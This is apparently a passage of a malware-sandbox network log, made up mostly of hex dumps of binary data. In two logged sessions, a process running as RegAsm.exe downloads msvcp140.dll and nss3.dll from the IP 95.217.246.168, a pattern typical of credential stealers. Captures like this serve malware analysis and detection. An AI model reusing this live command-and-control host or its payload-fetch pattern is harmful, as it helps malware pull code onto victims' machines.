2024-04-26 19:35:33 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-04-26 19:35:33 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
2024-04-26 19:35:33 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-04-26 19:35:33 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-04-26 19:35:33 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-04-26 19:35:33 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-04-26 19:35:34 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:35 UTC	159	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 19:35:36 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:35 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-04-26 19:35:36 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-04-26 19:35:36 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-04-26 19:35:36 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-04-26 19:35:36 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-04-26 19:35:36 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-04-26 19:35:36 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-04-26 19:35:36 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-04-26 19:35:36 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-04-26 19:35:36 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-04-26 19:35:36 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:39 UTC	155	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 19:35:39 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:39 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-04-26 19:35:39 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-04-26 19:35:39 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-04-26 19:35:40 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
